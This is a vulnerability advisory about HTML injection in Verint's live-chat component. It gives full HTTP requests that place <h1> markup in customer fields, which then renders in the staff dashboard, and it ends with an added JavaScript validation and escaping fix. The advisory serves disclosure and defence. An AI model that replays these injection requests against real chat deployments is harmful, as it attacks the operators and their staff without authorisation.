Verint Live-chat HTML injection

Verint live-chat is a component of Verint Engagement Management (version 15.3 Update 2023R2) that allows visitors of a website to ask questions through a chat box. The questions are answered by an employee via the Verint dashboard.
It is possible to inject HTML code through the "User Data" form of the live-chat; the injected markup is rendered in the employee's dashboard.

When a new chat is created, an API call is made. In the JSON body of this API call, it is possible to inject HTML code into the following parameters: "customerFirstName", "customerEmail", "customerLocale" and "refererURL".

POST /chat/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
Host: apps.x.nl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://staging.x.nl/
Content-Type: application/json
Content-Length: 234
Origin: https://staging.x.nl
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close

{"customerFirstName":"<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>",
"customerEmail":"<h1>ee@recoil.nl</h1>",
"customerLocale":"<h1>nl</h1>",
"chatLaunchMode":"CHAT_ONLY",
"refererURL":"<h1>https://recoil.nl<h1>",
"launchCode":"KanaChat",
"launchIdentifier":"KanaChat"}

Take note of the "userId" in the response; it is used in the next request to spawn a chat with the employee.

HTTP/1.1 201 Created
connection: close
content-type: application/hal+json
date: Mon, 08 May 2023 14:44:58 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
access-control-allow-origin: *
access-control-allow-methods: PUT, GET, POST, OPTIONS
access-control-allow-headers: origin, x-requested-with, content-type
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 0
strict-transport-security: max-age=31536000; includeSubDomains
Set-Cookie: JSESSIONID=Tsf70qRg5layXAoUlwgHYIrAC_3VFCKXjXtfiH1xE-KBpWrqsYyK!896618273; Path=/chat/; Secure; HttpOnly

{"userName":"AAAAAAAAAAAAAAAAAAAAAAAAA",
"userLoginId":"9678-648618303ce0f6327e41ba6a332e392376e615eb048a",
"userId":"vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am","_links":{"self":{"href":"/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"event":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"queuedstatus":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/queuedstatus?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}

With the following request we can spawn a chat box.

POST /chat/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
Host: apps.x.nl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://staging.x.nl/
Content-Type: application/json
Content-Length: 41
Origin: https://staging.x.nl
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close

[
	{
		"type":"MessageSent",
		"text":"123test"
	}
]

Response:

HTTP/1.1 200 OK
connection: close
content-type: application/hal+json
date: Mon, 08 May 2023 14:45:07 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
access-control-allow-origin: *
access-control-allow-methods: PUT, GET, POST, OPTIONS
access-control-allow-headers: origin, x-requested-with, content-type
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 0
strict-transport-security: max-age=31536000; includeSubDomains

{"events":[],"_links":{"self":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"nextevent":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}

By now the employee should receive a notification of a new incoming message. When the chat is opened, the HTML injection takes place, as shown in the red square in the screenshot below.

[Screenshot: html-injection.png]

When we inspect the source of the webpage, we see that the injected HTML has been interpreted as markup instead of being displayed as text, as shown in the screenshot below.

[Screenshot: html-injection-source.png]
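The following is an added example, not code from the advisory or from Verint, covering both the client-creation request above and the rendering step: it validates the four injectable fields server-side and escapes them before they are placed in the dashboard's markup. The field names come from the advisory; the validation rules, the sample body and the renderNameCard helper are assumptions.

```javascript
// Added example (not part of the advisory or Verint's code).
// Field names from the advisory; rules and sample body are assumptions.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape a value for safe insertion into an HTML text node or attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Reject values that are not plausible for each field rather than trying to
// strip tags. Returns the names of the fields that failed validation.
function validateClientPayload(body) {
  const rules = {
    customerFirstName: (v) => typeof v === 'string' && v.length <= 64 && !/[<>]/.test(v),
    customerEmail: (v) => typeof v === 'string' && /^[^\s<>@]+@[^\s<>@]+\.[^\s<>@]+$/.test(v),
    customerLocale: (v) => typeof v === 'string' && /^[a-z]{2,3}(-[A-Za-z0-9]{2,8})*$/.test(v),
    refererURL: (v) => {
      if (typeof v !== 'string') return false;
      try {
        const u = new URL(v); // throws on anything that is not a parseable URL
        return u.protocol === 'https:' || u.protocol === 'http:';
      } catch {
        return false;
      }
    },
  };
  return Object.keys(rules).filter((field) => field in body && !rules[field](body[field]));
}

// Constructed body mirroring the injected request shown in the advisory.
const injectedBody = {
  customerFirstName: '<h1>AAAA</h1>',
  customerEmail: '<h1>ee@recoil.nl</h1>',
  customerLocale: '<h1>nl</h1>',
  chatLaunchMode: 'CHAT_ONLY',
  refererURL: '<h1>https://recoil.nl<h1>',
  launchCode: 'KanaChat',
  launchIdentifier: 'KanaChat',
};

// Hypothetical dashboard rendering step: the name is escaped, so the
// injected <h1> is shown literally instead of being interpreted as markup.
function renderNameCard(name) {
  return `<div class="customer-name">${escapeHtml(name)}</div>`;
}

console.log('rejected fields:', validateClientPayload(injectedBody));
console.log(renderNameCard(injectedBody.customerFirstName));
```

Validation alone is not sufficient: the escaping in renderNameCard is what prevents the dashboard from interpreting a value that slipped through as markup.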